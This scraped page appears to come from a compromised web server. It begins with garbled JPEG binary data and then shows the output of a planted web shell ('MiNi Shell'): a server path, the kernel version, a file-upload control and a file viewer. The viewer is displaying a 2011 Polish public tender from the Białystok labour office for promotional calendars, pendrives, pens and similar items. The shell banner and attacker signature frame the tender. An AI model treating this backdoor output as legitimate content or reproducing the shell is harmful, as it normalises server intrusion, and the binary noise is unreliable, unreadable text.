JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110520/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110520/143339-N-2011.html

<p class="kh_header"><b>Białystok: Wykonanie i dostawa materiałów promocyjnych oraz usługa projektów graficznych</b><br>
<b>Numer ogłoszenia: 143339 - 2011; data zamieszczenia: 20.05.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy , ul. Sienkiewicza 82, 15-005 Białystok, woj. podlaskie, tel. 085 747 3800, faks 085 747 3861.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pup.bialystok.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie i dostawa materiałów promocyjnych oraz usługa projektów graficznych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Kalendarz: książkowy na rok 2012: 

- 150 szt., format - A 5, ok. 360 stron. Kalendarium w języku polskim: układ dzienny, druk: 2-kolorowy (bordowo-czarny), papier chamois 70g m2, oprawa skóropodobna brązowa z wytłoczonym rokiem 2011, zakładka: 1 tasiemka, 
1 kartkowa wklejka -  z przodu, (wklejka wg projektu wykonanego przez Wykonawcę, zgodnie z informacjami przekazanymi przez Powiatowy Urząd Pracy) papier kredowy błyszczący 130g m2 zadruk 4+4, dodatkowe informacje np.: czas na świecie, odległości, święta ruchome, tabele rozmiarów, kolorowa mapa Polski, itp., według projektu graficznego opracowanego przez Wykonawcę. 

2.	Kalendarz: trójdzielny na rok 2012: 

- 200 szt., wykonany z tektury o gramaturze 300 g m2 z kaszerowanym przodem, (łącznie z główką - wykończoną folią matową). Kalendarium standardowe, dwukolorowe (biały + kremowy), okienko, pełny kolor (4+0), wymiary kalendarza: ok. 830mm x 320mm, (wymiary główki kalendarza: 200mm 
x 320mm), według projektu graficznego opracowanego przez Wykonawcę. 

3.	Kalendarz: ścienny na rok 2012: 

- 70 szt., kalendarz ścienny, format B1, papier kredowany - błysk o gramaturze ok. 180 g m2, pełny kolor (4+0), druk offsetowy, wykończenie - listwy metalowe (krótsze boki), według projektu graficznego opracowanego przez Wykonawcę. 

4.	Kalendarz książkowy na rok 2012 - kieszonkowy A 6:

- 100 szt., wymiary ok. 150 x 80 mm  kalendarium w języku polskim: układ tygodniowy ok. 128 stron, papier chamois 70g m2, oprawa skóropodobna granatowa z wytłoczonym rokiem 2011, zakładka: 1 tasiemka, narożniki perforowane, 1 kartkowa wklejka -  z przodu, (wklejka wg projektu wykonanego przez Wykonawcę, zgodnie z informacjami przekazanymi przez Powiatowy Urząd Pracy) papier kredowy błyszczący 130g m2 zadruk 4+4, dodatkowe informacje np.: czas na świecie, odległości, święta ruchome, tabele rozmiarów, kolorowa mapa Polski, itp., według projektu graficznego opracowanego przez Wykonawcę.

5.	Pendrive:

a)	- 300 szt., pojemność USB 4 GB, wielkość: ok. 70 mm  x 25 mm x 9 mm, obudowa - kolor: szary + czarny, plastik + aluminium z satynowym wykończeniem, płaski, prosty z zaokrąglonymi bokami (w kształcie zbliżony do owalu), smycz, pudełko tekturowe, na obudowie umieszczone logo i nazwa Urzędu - naniesione metodą tampondruku.

b)	- 1000 szt., pojemność USB 4 GB, wielkość: ok. 70 mm  x 25 mm x 9 mm, obudowa - kolor: szary + czarny, plastik + aluminium z satynowym wykończeniem, płaski, prosty z zaokrąglonymi bokami (w kształcie zbliżony do owalu), smycz, pudełko tekturowe. 
Oznakowanie - wariant minimalny, który będzie zawierał zgodnie 
z rozporządzeniem Komisji (WE) nr 1828 2006 z dnia 08.12.2006 oraz Księgą identyfikacji wizualnej NSS: Logo PO KL, Flagę Unii Europejskiej 
z odwołaniem słownym do Unii Europejskiej - wariant jedno kolorowy, naniesione metodą tampondruku.
 
Zamawiający wymaga aby produkt był objęty min. rocznym okresem gwarancyjnym.	

6.	Zestaw post it z kalendarzem na rok 2012:

- 200 szt.  Zestaw zawiera bloczki samoprzylepnych kartek w kształcie strzałek w 8 pastelowych kolorach oraz 1 duży i 1 mały bloczek w kształcie prostokąta. Zapakowany w pudełko ze skóry ekologicznej. Otwarcie pudełka umożliwia skorzystanie z całorocznego kalendarza, który jest umieszczony na wewnętrznej stronie pudełka. Nadruk: na pudełku logo i nazwa Urzędu.
Kolor: czarny. Wymiary: ok. 13 x 10,5 x 3cm

7.	Długopis:
a) - 500 szt., metalowy, ze skuwką,  z wykręcanym, wymiennym wkładem (wkład z niebieskim tuszem), cienkopiszący, z wykończeniami: obrączką i skuwką 
w  kolorze złotym;  kolor korpusu: bordowy (250 szt.), granatowy (250 szt.), 
na długopisie umieszczona strona internetowa Urzędu,
b) - 500 szt., plastikowy, automatyczny,  cienkopiszący, z wymiennym wkładem (wkład z niebieskim tuszem)  z wykończeniami: obrączką i skuwką w  kolorze srebrnym, kolor korpusu: stalowy (250 szt.), kolor czarny (250 szt.), na długopisie umieszczona strona internetowa Urzędu.

8.   Pióro kulkowe w etui

       a)	50 szt. - eleganckie metalowe pióro kulkowe z wymiennym wkładem w     
            kolorze niebieskim, wymiary ok. 1cm x 14cm, materiał: metal,  kolor złoty.    
            Nadruk:  na  piórze kulkowym -  adres strony internetowej Urzędu.
     
      b) 50 szt. - eleganckie metalowe pióro kulkowe z wymiennym wkładem w     
            kolorze niebieskim, wymiary ok. 1cm x 14cm, materiał: metal,  kolor czarno-   
            złoty.    
            Nadruk:  na  piórze kulkowym -  adres strony internetowej Urzędu.


9.	Teczka A 4:
- 500 szt., surowiec: karton 300 g m2, nadruk offsetowy w pełnym kolorze, wielkość dostosowana do umieszczania dokumentów w formacie A 4, grubość grzbietu teczki: ok. 5 mm, wykończenie: laminowanie jednostronne folią matową, wewnątrz w prawym dolnym rogu kieszeń na dokumenty z nacięciami na wizytówki, grubość grzbietu kieszeni  ok. 4 mm,  na czołowej stronie teczki zamieszczone jest logo, nazwa Urzędu na zewnętrznej stronie, tylnej okładki zamieszczone - dane teleadresowe Urzędu, wg projektu graficznego Zamawiającego, (zadruk 4+0).

10.	Torba papierowa:
- 300 szt., surowiec: papier kredowany o gramaturze 180-200 g m2, 
z laminatem matowym, z przewlekanym bawełnianym sznurkiem, górne krawędzie zawijane do wewnątrz, wzmocnione dno torby oraz górne krawędzie za pomocą tektury, wymiary ok.: szer. 230mm x wys.295mm x gł.80 mm, nadruk offsetowy w pełnym kolorze (4+0), logo, nazwa Urzędu, strona internetowa., 
wg projektu graficznego Zamawiającego.

11.	Karteczki nieprzylepne:
- 1000 szt., format A7, objętość 50 kartek nieprzylepnych w bloczku, klejone po krótszym bloku, o wymiarach 75 mm x 100 mm. Biały papier o gramaturze 100g  m2 z zamieszczonymi w nagłówku: logo, nazwą, danymi teleadresowymi 
i stroną internetową Urzędu, wg projektu graficznego opracowanego przez Wykonawcę, (zadruk 4+0).

12.	Smycz:
- 300 szt., szyta, taśma płaska matowa poliestrowa w kolorze ciemnej zieleni, barwiona dwustronnie, nadruk jednostronny w pełnym kolorze (logo, strona internetowa), szer. taśmy 15 mm, długość po złożeniu 500 mm, zakończona metalowym karabińczykiem, wg projektu graficznego Zamawiającego.

13.	Zaświadczenie A 5: 

- 500 szt., surowiec: papier kreda mat o gramaturze ok. 350 g m2, zdobienie: nadruk offsetowy w pełnym kolorze, wymiary: 148 x 210mm.  Druk jednostronny (4+0) zaświadczenia wg projektu Wykonawcy, treść zostanie przekazana 
i ustalona przez Zamawiającego. 
Oznakowanie - wariant podstawowy, który będzie zawierał zgodnie 
z rozporządzeniem Komisji (WE) nr 1828 2006 z dnia 08.12.2006 oraz Księgą identyfikacji wizualnej NSS: Logo PO KL, Flagę Unii Europejskiej z odwołaniem słownym do Unii Europejskiej i Europejskiego Funduszu Społecznego, Logo PUP w Białymstoku - wariant pełnokolorowy, informację o współfinansowaniu: Projekt POdejmij KLuczową decyzję współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.

14.	Naklejka 

- 10000 szt., surowiec: papier samoprzylepny błysk, biały, wymiar: ok. 40x70 mm, zdobienie: nadruk jednostronny pełny kolor, według projektu graficznego Zamawiającego. Oznakowanie - wariant podstawowy, który będzie zawierał zgodnie z rozporządzeniem Komisji (WE) nr 1828 2006 z dnia 08.12.2006 oraz Księgą identyfikacji wizualnej NSS: Logo PO KL, Flagę Unii Europejskiej z odwołaniem słownym do Unii Europejskiej i Europejskiego Funduszu Społecznego - wariant pełnokolorowy, informację o współfinansowaniu: Zakup współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, wykończenie: cięcie.

15.	Zestaw IT

    - 30 szt., w skład zestawu wchodzi: klawiatura numeryczna, lampka, myszka do komputera USB, uniwersalny adapter USB, przedłużka USB, 4 porty USB, zestaw słuchawkowy  zapakowany w etui z rączką. Na etui naniesione logo Urzędu.
                  
16.	Translator 

- 60 szt., 5 tys. słów w każdym języku (angielski, niemiecki, hiszpański, włoski, francuski, holenderski), w kolorze antracytowym lub srebrnym, z naniesionym adresem strony internetowej Urzędu.



                    		
17.	Zegar biurkowy

- 30 szt., zegar biurkowy z funkcja alarmu, daty, higrometru, termometru, prognozy pogody. Dodatkowo posiadający podświetlany ekran LCD  oraz projektor z czerwonymi diodami LED oraz umieszczoną z tyłu składaną podstawką  a także złącze do zasilania.  Oznakowanie - logo Urzędu.

                   

Usługa Projektów Graficznych

1.	Projekty graficzne dotyczą pozycji: 1,2,3,4,9,10,11,13,14, (poz.: 1,4 - ten sam projekt graficzny), w przypadku pozycji: 9,10,14  zastosowany zostanie projekt graficzny Zamawiającego.
2.	Zamieszczone na materiałach promocyjnych (pozycje: 5b,13,14), oznakowanie musi być w proporcjach, kolorach i innych szczegółach znaku zgodne z Wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki Warszawa, 4 luty 2009 r.
Gwarancje
Zamawiający wymaga aby poz.: 5,15,16,17 były objęte min. rocznym okresem gwarancyjnym..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 39.29.41.00-0, 79.82.25.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 4.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wypełniony formularz ofertowy - zał. nr 1 do SIWZ,
wypełniony formularz cenowy - zał. nr 2 do SIWZ</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pup.bialystok.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd Pracy w Białymstoku.
ul. Sienkiewicza 82, pok. 210 A
15-005 Białystok.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.05.2011 godzina 11:30, miejsce: Powiatowy Urząd Pracy w Białymstoku.
ul. Sienkiewicza 82, pok. 314
15-005 Białystok.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com